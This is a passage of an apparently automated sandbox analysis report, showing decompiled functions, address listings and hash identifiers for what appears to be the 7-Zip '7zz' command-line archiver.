					 *(_t218 - 4) = 4;
					E0040862D();
					 *(_t218 - 4) = 1;
					E00408604(_t218 - 0x20);
					_t208 = 0;
					if( *((intOrPtr*)(_t218 - 0x80)) > 0) {
						do {
							if(( *( *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x7c)) + _t208 * 4)) + 0x2c) >> 0x00000004 & 0x00000001) == 0) {
								_push(E0041528B(_t218 - 0xc4, _t218 - 0x18, _t208));
								 *(_t218 - 4) = 5;
								L00406796(_t218 - 0x38);
								 *(_t218 - 4) = 1;
								L00407A18( *(_t218 - 0x18));
							}
							_t208 = _t208 + 1;
							_t228 = _t208 -  *((intOrPtr*)(_t218 - 0x80));
						} while (_t208 <  *((intOrPtr*)(_t218 - 0x80)));
					}
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E004102DF(_t218 - 0xc4, _t228);
					if( *((intOrPtr*)(_t218 - 0x30)) == _t168) {
						 *(_t218 + 8) = "there is no such archive";
						L0046B8F4(_t218 + 8, 0x47cf70);
					}
					E00405B9F(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					_t209 = 0;
					 *(_t218 - 4) = 6;
					if( *((intOrPtr*)(_t218 - 0x30)) > _t168) {
						do {
							 *(_t218 - 0x18) = _t168;
							 *(_t218 - 0x14) = _t168;
							 *(_t218 - 0x10) = _t168;
							E00401E9A(_t218 - 0x18, 3);
							 *(_t218 - 4) = 7;
							L0040A5AF();
							_push(_t218 - 0x18);
							L00406796(_t218 - 0x60);
							 *(_t218 - 4) = 6;
							L00407A18( *(_t218 - 0x18));
							_t209 = _t209 + 1;
						} while (_t209 <  *((intOrPtr*)(_t218 - 0x30)));
					}
					E00404AD0(_t218 - 0x4c, 4);
					 *((intOrPtr*)(_t218 - 0x4c)) = 0x47a668;
					 *(_t218 - 4) = 8;
					E004195A6(_t218 - 0x60, _t218 - 0x4c);
					E0040867E( *((intOrPtr*)(_t218 - 0x24)),  *((intOrPtr*)(_t218 - 0x44)));
					E0040867E( *(_t218 + 8),  *((intOrPtr*)(_t218 - 0x44)));
					if( *((intOrPtr*)(_t218 - 0x44)) > _t168) {
						do {
							_t212 =  *( *((intOrPtr*)(_t218 - 0x40)) + _t168 * 4) << 2;
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x2c)))));
							L00406796( *((intOrPtr*)(_t218 - 0x24)));
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x54)))));
							L00406796( *(_t218 + 8));
							_t168 = _t168 + 1;
						} while (_t168 <  *((intOrPtr*)(_t218 - 0x44)));
					}
					 *(_t218 - 4) = 6;
					E00408604(_t218 - 0x4c);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					 *(_t218 - 4) = 9;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E00408604(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
					 *(_t218 - 4) = 0xa;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) | 0xffffffff;
					_t142 = E00408604(_t218 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t218 - 0xc));
					return _t142;
				}
			}













                                                                                  0x00410043
                                                                                  0x00410053
                                                                                  0x00410059
                                                                                  0x00410063
                                                                                  0x00410066
                                                                                  0x0041006e
                                                                                  0x00410071
                                                                                  0x00410079
                                                                                  0x0041007d
                                                                                  0x00410082
                                                                                  0x0041008a
                                                                                  0x0041008e
                                                                                  0x00410093
                                                                                  0x004100a3
                                                                                  0x004100a7
                                                                                  0x004100a8
                                                                                  0x004100a9
                                                                                  0x004100ab
                                                                                  0x004100af
                                                                                  0x004100b6
                                                                                  0x00410281
                                                                                  0x00410288
                                                                                  0x0041028d
                                                                                  0x0041028e
                                                                                  0x00410292
                                                                                  0x00410294
                                                                                  0x0041029a
                                                                                  0x0041029d
                                                                                  0x004102a0
                                                                                  0x004102a3
                                                                                  0x004102a6
                                                                                  0x004102ac
                                                                                  0x004102af
                                                                                  0x004102b2
                                                                                  0x004102b5
                                                                                  0x004102b8
                                                                                  0x004102bb
                                                                                  0x004102be
                                                                                  0x004102c1
                                                                                  0x004102c4
                                                                                  0x004102c7
                                                                                  0x004102ca
                                                                                  0x004102cd
                                                                                  0x004102d0
                                                                                  0x004102d3
                                                                                  0x004102d6
                                                                                  0x004102de
                                                                                  0x004100c5
                                                                                  0x004100c8
                                                                                  0x004100cc
                                                                                  0x004100d1
                                                                                  0x004100d7
                                                                                  0x004100db
                                                                                  0x004100e3
                                                                                  0x004100e7
                                                                                  0x004100ec
                                                                                  0x004100f1
                                                                                  0x004100f3
                                                                                  0x00410101
                                                                                  0x00410113
                                                                                  0x00410117
                                                                                  0x0041011b
                                                                                  0x00410120
                                                                                  0x00410127
                                                                                  0x0041012c
                                                                                  0x0041012d
                                                                                  0x0041012e
                                                                                  0x0041012e
                                                                                  0x004100f3
                                                                                  0x00410133
                                                                                  0x0041013d
                                                                                  0x00410145
                                                                                  0x00410150
                                                                                  0x00410157
                                                                                  0x00410157
                                                                                  0x0041015f
                                                                                  0x00410164
                                                                                  0x00410167
                                                                                  0x0041016c
                                                                                  0x00410170
                                                                                  0x00410172
                                                                                  0x00410177
                                                                                  0x0041017a
                                                                                  0x0041017d
                                                                                  0x00410180
                                                                                  0x0041018b
                                                                                  0x00410196
                                                                                  0x004101a1
                                                                                  0x004101a2
                                                                                  0x004101a7
                                                                                  0x004101ae
                                                                                  0x004101b3
                                                                                  0x004101b5
                                                                                  0x00410172
                                                                                  0x004101bf
                                                                                  0x004101c4
                                                                                  0x004101d1
                                                                                  0x004101d5
                                                                                  0x004101e0
                                                                                  0x004101eb
                                                                                  0x004101f3
                                                                                  0x004101f5
                                                                                  0x00410203
                                                                                  0x00410206
                                                                                  0x00410209
                                                                                  0x00410214
                                                                                  0x00410217
                                                                                  0x0041021c
                                                                                  0x0041021d
                                                                                  0x004101f5
                                                                                  0x00410225
                                                                                  0x00410229
                                                                                  0x0041022e
                                                                                  0x00410234
                                                                                  0x00410238
                                                                                  0x0041023d
                                                                                  0x00410244
                                                                                  0x00410249
                                                                                  0x0041024f
                                                                                  0x00410256
                                                                                  0x0041025b
                                                                                  0x00410262
                                                                                  0x0041026d
                                                                                  0x00410275
                                                                                  0x00410275

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00410043
                                                                                    • Part of subcall function 00415349: __EH_prolog.LIBCMT ref: 0041534E
                                                                                    • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3519838083-2780377667
                                                                                  • Opcode ID: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
                                                                                  • Instruction ID: a6bdb68d8052a433f7f109985f49a34908dcb5d84b45f2bdbde216e6b6000813
                                                                                  • Opcode Fuzzy Hash: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
                                                                                  • Instruction Fuzzy Hash: AD914EB0C00258DFCB14EF9AC985ADDBBB5BF54308F1181AEE109B7292DB785A44CF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0041721B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 97%
                                                                                  			E0041721B(void* __ecx, void* __eflags) {
				void* __edi;
				void* _t66;
				signed int _t77;
				void* _t86;
				void* _t88;
				signed int _t115;
				void* _t120;

				L0046B890(E00474C34, _t120);
				_t86 = __ecx;
				E00405B9F(_t120 - 0x38);
				 *((intOrPtr*)(_t120 - 0x38)) = 0x47a420;
				_t115 = 0;
				 *(_t120 - 4) = 0;
				E00405B9F(_t120 - 0x4c);
				 *((intOrPtr*)(_t120 - 0x4c)) = 0x47a420;
				_t126 =  *((intOrPtr*)(_t120 + 8));
				 *(_t120 - 4) = 1;
				if( *((intOrPtr*)(_t120 + 8)) != 0) {
					L00403532(_t120 - 0x18,  *((intOrPtr*)(_t120 + 8))); // executed
					 *(_t120 - 4) = 2;
					L00417377(_t120 - 0x18, _t120 - 0x38, _t126);
					 *(_t120 - 4) = 1;
					L00407A18( *(_t120 - 0x18));
				}
				_t127 =  *((intOrPtr*)(_t120 + 0xc)) - _t115;
				if( *((intOrPtr*)(_t120 + 0xc)) != _t115) {
					L00403532(_t120 - 0x18,  *((intOrPtr*)(_t120 + 0xc)));
					 *(_t120 - 4) = 3;
					L00417377(_t120 - 0x18, _t120 - 0x4c, _t127);
					 *(_t120 - 4) = 1;
					L00407A18( *(_t120 - 0x18));
				}
				if( *((intOrPtr*)(_t120 - 0x30)) <= 0) {
					L10:
					 *((intOrPtr*)(_t120 - 0x4c)) = 0x47a420;
					 *(_t120 - 4) = 6;
					E0040862D();
					 *(_t120 - 4) =  *(_t120 - 4) & 0x00000000;
					E00408604(_t120 - 0x4c);
					 *((intOrPtr*)(_t120 - 0x38)) = 0x47a420;
					 *(_t120 - 4) = 7;
					E0040862D();
					 *(_t120 - 4) =  *(_t120 - 4) | 0xffffffff;
					_t66 = E00408604(_t120 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t120 - 0xc));
					return _t66;
				} else {
					_t88 = _t86 + 0x18;
					do {
						L0040351A(_t120 - 0x24);
						 *(_t120 - 4) = 4;
						L0040351A(_t120 - 0x18);
						 *(_t120 - 4) = 5;
						E00401E26(_t120 - 0x24,  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x2c)) + _t115 * 4)));
						if(_t115 <  *((intOrPtr*)(_t120 - 0x44))) {
							E00401E26(_t120 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x40)) + _t115 * 4)));
							_t77 = E00408053( *(_t120 - 0x18), 0x48bb7c);
							if(_t77 == 0) {
								 *(_t120 - 0x14) =  *(_t120 - 0x14) & _t77;
								 *( *(_t120 - 0x18)) =  *( *(_t120 - 0x18)) & 0x00000000;
							}
						}
						_push(_t120 - 0x24);
						L00417791(_t88, _t115);
						 *(_t120 - 4) = 1;
						L00407A18( *(_t120 - 0x18));
						L00407A18( *((intOrPtr*)(_t120 - 0x24)));
						_t115 = _t115 + 1;
					} while (_t115 <  *((intOrPtr*)(_t120 - 0x30)));
					goto L10;
				}
			}










                                                                                  0x00417220
                                                                                  0x00417229
                                                                                  0x00417230
                                                                                  0x0041723a
                                                                                  0x0041723d
                                                                                  0x00417242
                                                                                  0x00417245
                                                                                  0x0041724a
                                                                                  0x0041724d
                                                                                  0x00417250
                                                                                  0x00417254
                                                                                  0x0041725c
                                                                                  0x00417267
                                                                                  0x0041726b
                                                                                  0x00417273
                                                                                  0x00417277
                                                                                  0x0041727c
                                                                                  0x0041727d
                                                                                  0x00417280
                                                                                  0x00417288
                                                                                  0x00417293
                                                                                  0x00417297
                                                                                  0x0041729f
                                                                                  0x004172a3
                                                                                  0x004172a8
                                                                                  0x004172ad
                                                                                  0x0041732d
                                                                                  0x0041732d
                                                                                  0x00417333
                                                                                  0x00417337
                                                                                  0x0041733c
                                                                                  0x00417343
                                                                                  0x00417348
                                                                                  0x0041734e
                                                                                  0x00417355
                                                                                  0x0041735a
                                                                                  0x00417361
                                                                                  0x0041736c
                                                                                  0x00417374
                                                                                  0x004172af
                                                                                  0x004172af
                                                                                  0x004172b2
                                                                                  0x004172b5
                                                                                  0x004172bd
                                                                                  0x004172c1
                                                                                  0x004172cc
                                                                                  0x004172d3
                                                                                  0x004172db
                                                                                  0x004172e6
                                                                                  0x004172f3
                                                                                  0x004172fa
                                                                                  0x004172fc
                                                                                  0x00417302
                                                                                  0x00417302
                                                                                  0x004172fa
                                                                                  0x0041730b
                                                                                  0x0041730c
                                                                                  0x00417314
                                                                                  0x00417318
                                                                                  0x00417320
                                                                                  0x00417325
                                                                                  0x0041732a
                                                                                  0x00000000
                                                                                  0x004172b2

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00417220
                                                                                    • Part of subcall function 00417377: __EH_prolog.LIBCMT ref: 0041737C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3519838083-2780377667
                                                                                  • Opcode ID: 5004501c2401821115a51ffef3e39df9269668dc0aafc01eff95271498320234
                                                                                  • Instruction ID: 873c80215d370b6b671446c0e79e2b2cb706c6381e77b2058a47ab1539bbaff3
                                                                                  • Opcode Fuzzy Hash: 5004501c2401821115a51ffef3e39df9269668dc0aafc01eff95271498320234
                                                                                  • Instruction Fuzzy Hash: C6416D71C0414DEECF05EFA5D546AEDBFB0AF54318F10806EE80173292DB386A85DBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040C83C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 44%
                                                                                  			E0040C83C(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				intOrPtr _t42;
				intOrPtr* _t45;
				signed int _t50;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;

				L0046B890(0x473e52, _t60);
				_push(__ecx);
				_push(__ecx);
				_t26 =  *0x490be0; // 0x12
				 *((intOrPtr*)(_t60 - 0x14)) = __edx;
				_t50 = 0;
				 *((intOrPtr*)(_t60 - 0x10)) = __ecx;
				if(_t26 <= 0) {
					L17:
					if( *((intOrPtr*)(_t60 + 0x18)) != 0) {
						_t53 =  *((intOrPtr*)(_t60 - 0x10));
						if( *( *((intOrPtr*)(_t60 - 0x10))) != 0) {
							_push(0x78);
							_t42 = L004079F2();
							 *((intOrPtr*)(_t60 + 0x14)) = _t42;
							 *(_t60 - 4) = 0;
							if(_t42 == 0) {
								_t58 = 0;
							} else {
								_t31 = E0040D550(_t42); // executed
								_t58 = _t31;
							}
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							E0040C9B4( *((intOrPtr*)(_t60 - 0x14)), _t58);
							_t22 = _t58 + 0x74; // 0x74
							E0040C9B4(_t22,  *_t53);
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
					return 0;
				} else {
					_t45 = 0x490ae0;
					do {
						_t59 =  *_t45;
						if( *((intOrPtr*)(_t59 + 8)) ==  *((intOrPtr*)(_t60 + 8)) &&  *((intOrPtr*)(_t59 + 0xc)) ==  *((intOrPtr*)(_t60 + 0xc))) {
							if( *((intOrPtr*)(_t60 + 0x14)) == 0) {
								if( *_t59 != 0) {
									_t32 =  *_t59();
									L11:
									if( *((intOrPtr*)(_t59 + 0x18)) == 0) {
										_push(_t32);
										if( *((intOrPtr*)(_t59 + 0x14)) != 1) {
											E0040C9B4( *((intOrPtr*)(_t60 + 0x10)));
										} else {
											E0040C9B4( *((intOrPtr*)(_t60 - 0x14)));
										}
									} else {
										E0040C9B4( *((intOrPtr*)(_t60 - 0x10)), _t32);
									}
									goto L17;
								}
								goto L8;
							}
							if( *((intOrPtr*)(_t59 + 4)) != 0) {
								_t32 =  *((intOrPtr*)(_t59 + 4))();
								goto L11;
							} else {
								goto L8;
							}
						}
						L8:
						_t50 = _t50 + 1;
						_t45 = _t45 + 4;
					} while (_t50 < _t26);
					goto L17;
				}
			}












                                                                                  0x0040c841
                                                                                  0x0040c846
                                                                                  0x0040c847
                                                                                  0x0040c848
                                                                                  0x0040c84e
                                                                                  0x0040c853
                                                                                  0x0040c859
                                                                                  0x0040c85c
                                                                                  0x0040c8bf
                                                                                  0x0040c8c2
                                                                                  0x0040c8c4
                                                                                  0x0040c8c9
                                                                                  0x0040c8cb
                                                                                  0x0040c8d3
                                                                                  0x0040c8d5
                                                                                  0x0040c8da
                                                                                  0x0040c8dd
                                                                                  0x0040c8e8
                                                                                  0x0040c8df
                                                                                  0x0040c8df
                                                                                  0x0040c8e4
                                                                                  0x0040c8e4
                                                                                  0x0040c8ed
                                                                                  0x0040c8f2
                                                                                  0x0040c8f9
                                                                                  0x0040c8fc
                                                                                  0x0040c8fc
                                                                                  0x0040c8c9
                                                                                  0x0040c909
                                                                                  0x0040c911
                                                                                  0x0040c85e
                                                                                  0x0040c85e
                                                                                  0x0040c863
                                                                                  0x0040c863
                                                                                  0x0040c86b
                                                                                  0x0040c878
                                                                                  0x0040c883
                                                                                  0x0040c8b3
                                                                                  0x0040c892
                                                                                  0x0040c895
                                                                                  0x0040c8a6
                                                                                  0x0040c8a7
                                                                                  0x0040c8ba
                                                                                  0x0040c8a9
                                                                                  0x0040c8ac
                                                                                  0x0040c8ac
                                                                                  0x0040c897
                                                                                  0x0040c89b
                                                                                  0x0040c89b
                                                                                  0x00000000
                                                                                  0x0040c895
                                                                                  0x00000000
                                                                                  0x0040c883
                                                                                  0x0040c87d
                                                                                  0x0040c88f
                                                                                  0x00000000
                                                                                  0x0040c87f
                                                                                  0x00000000
                                                                                  0x0040c87f
                                                                                  0x0040c87d
                                                                                  0x0040c885
                                                                                  0x0040c885
                                                                                  0x0040c886
                                                                                  0x0040c889
                                                                                  0x00000000
                                                                                  0x0040c88d

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: I
                                                                                  • API String ID: 3519838083-299795746
                                                                                  • Opcode ID: 459aedaa02336b51509d93332a302b4edd80c34f2b1668e4d39c44968d6b4148
                                                                                  • Instruction ID: 7b3e389aea170d28871fe4c7e7a7ec955f419ab3ca2688fab4717e103c8f7ea0
                                                                                  • Opcode Fuzzy Hash: 459aedaa02336b51509d93332a302b4edd80c34f2b1668e4d39c44968d6b4148
                                                                                  • Instruction Fuzzy Hash: F8218C72904245DBDB24FFA589C046EB7A2AB40305B24863FE152B76C1CB38AD45D79E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00415349 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 94%
                                                                                  			E00415349(intOrPtr __ecx, intOrPtr __edx) {
				void* _t40;
				signed int _t41;
				signed int _t42;
				void* _t43;
				intOrPtr _t50;
				intOrPtr _t64;
				void* _t65;
				void* _t69;

				_t50 = __ecx;
				L0046B890(E00474820, _t69);
				 *((intOrPtr*)(_t69 - 0x14)) = __edx;
				 *((intOrPtr*)(_t69 - 0x18)) = __ecx;
				 *(_t69 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L8:
					E004152E1( *((intOrPtr*)(_t69 - 0x14)));
					_t40 = 0;
				} else {
					while(1) {
						_t41 =  *(_t50 + 0xc);
						_t64 =  *((intOrPtr*)(_t41 +  *(_t69 - 0x10) * 4));
						if( *((intOrPtr*)(_t64 + 4)) != 0) {
							_push(_t64);
							_push(0xffffffff);
							_t42 = E00415303( *((intOrPtr*)(_t69 - 0x14)), _t69, __eflags, 0xffffffff);
						} else {
							_t42 = _t41 | 0xffffffff;
						}
						 *((intOrPtr*)(_t69 - 0x28)) = 0;
						 *((intOrPtr*)(_t69 - 0x24)) = 0;
						 *((intOrPtr*)(_t69 - 0x20)) = 0;
						 *((intOrPtr*)(_t69 - 0x1c)) = 4;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 0;
						_t23 = _t64 + 0xc; // 0xc, executed
						_t43 = E00415420(_t23, _t42, 0xffffffff, _t64, _t69 - 0x2c,  *((intOrPtr*)(_t69 - 0x14)), 0,  *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 0x10))); // executed
						_t65 = _t43;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 1;
						E0040862D();
						 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
						E00408604(_t69 - 0x2c);
						if(_t65 != 0) {
							break;
						}
						 *(_t69 - 0x10) =  *(_t69 - 0x10) + 1;
						if( *(_t69 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t69 - 0x18)) + 8))) {
							_t50 =  *((intOrPtr*)(_t69 - 0x18));
							continue;
						} else {
							goto L8;
						}
						goto L9;
					}
					_t40 = _t65;
				}
				L9:
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t40;
			}











                                                                                  0x00415349
                                                                                  0x0041534e
                                                                                  0x0041535e
                                                                                  0x00415361
                                                                                  0x00415364
                                                                                  0x00415367
                                                                                  0x00415401
                                                                                  0x00415404
                                                                                  0x00415409
                                                                                  0x0041536d
                                                                                  0x00415377
                                                                                  0x00415377
                                                                                  0x0041537d
                                                                                  0x00415383
                                                                                  0x0041538d
                                                                                  0x0041538e
                                                                                  0x00415392
                                                                                  0x00415385
                                                                                  0x00415385
                                                                                  0x00415385
                                                                                  0x00415397
                                                                                  0x0041539a
                                                                                  0x0041539d
                                                                                  0x004153a0
                                                                                  0x004153a7
                                                                                  0x004153b2
                                                                                  0x004153c3
                                                                                  0x004153c6
                                                                                  0x004153cb
                                                                                  0x004153cd
                                                                                  0x004153d3
                                                                                  0x004153da
                                                                                  0x004153df
                                                                                  0x004153e6
                                                                                  0x004153ed
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004153ef
                                                                                  0x004153fb
                                                                                  0x00415374
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004153fb
                                                                                  0x0041541c
                                                                                  0x0041541c
                                                                                  0x0041540b
                                                                                  0x00415411
                                                                                  0x00415419

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3519838083-2780377667
                                                                                  • Opcode ID: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
                                                                                  • Instruction ID: 7eef16f8fbdbee1da98b56e57a5457bfcb84ef35117a6ae98f398b0350cb022f
                                                                                  • Opcode Fuzzy Hash: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
                                                                                  • Instruction Fuzzy Hash: E62128B1D00519DFCB04DF99C8819EEFB71FB88368F20822EE52567290D7755981CF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040B431 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040B431(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				signed int _t24;
				void* _t53;

				L0046B890(0x473d9c, _t53);
				_t47 =  *(_t53 + 8);
				if(L0040B669( *(_t53 + 8)) == 0) {
					_t15 = _t53 + 8;
					 *_t15 =  *(_t53 + 8) | 0xffffffff;
					__eflags =  *_t15;
					 *(_t53 - 4) = 1;
					_t24 = E0040B174(_t53 + 8, _t47,  *_t15, _t47, __ecx); // executed
					_t34 = _t24;
					E0040B154(_t53 + 8);
				} else {
					L0040B414(__ecx);
					 *(_t53 - 0x1c) =  *(_t53 - 0x1c) | 0xffffffff;
					 *((char*)(__ecx + 0x24)) = 1;
					_t34 = 0;
					 *(_t53 - 4) = 0;
					if(L0040BC4A(_t47) != 0) {
						L00403593(__ecx + 0x28, _t47 + 8);
						if( *((intOrPtr*)(_t53 - 0x17)) != 0) {
							 *__ecx =  *((intOrPtr*)(_t53 - 0x14));
							 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t53 - 0x10));
						}
						_t34 = 1;
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					L0040B87D(_t53 - 0x1c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t34;
			}






                                                                                  0x0040b436
                                                                                  0x0040b441
                                                                                  0x0040b44f
                                                                                  0x0040b49e
                                                                                  0x0040b49e
                                                                                  0x0040b49e
                                                                                  0x0040b4a7
                                                                                  0x0040b4ae
                                                                                  0x0040b4b6
                                                                                  0x0040b4b8
                                                                                  0x0040b451
                                                                                  0x0040b453
                                                                                  0x0040b458
                                                                                  0x0040b45c
                                                                                  0x0040b460
                                                                                  0x0040b466
                                                                                  0x0040b470
                                                                                  0x0040b479
                                                                                  0x0040b481
                                                                                  0x0040b486
                                                                                  0x0040b48b
                                                                                  0x0040b48b
                                                                                  0x0040b48e
                                                                                  0x0040b48e
                                                                                  0x0040b490
                                                                                  0x0040b497
                                                                                  0x0040b497
                                                                                  0x0040b4c5
                                                                                  0x0040b4cd

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
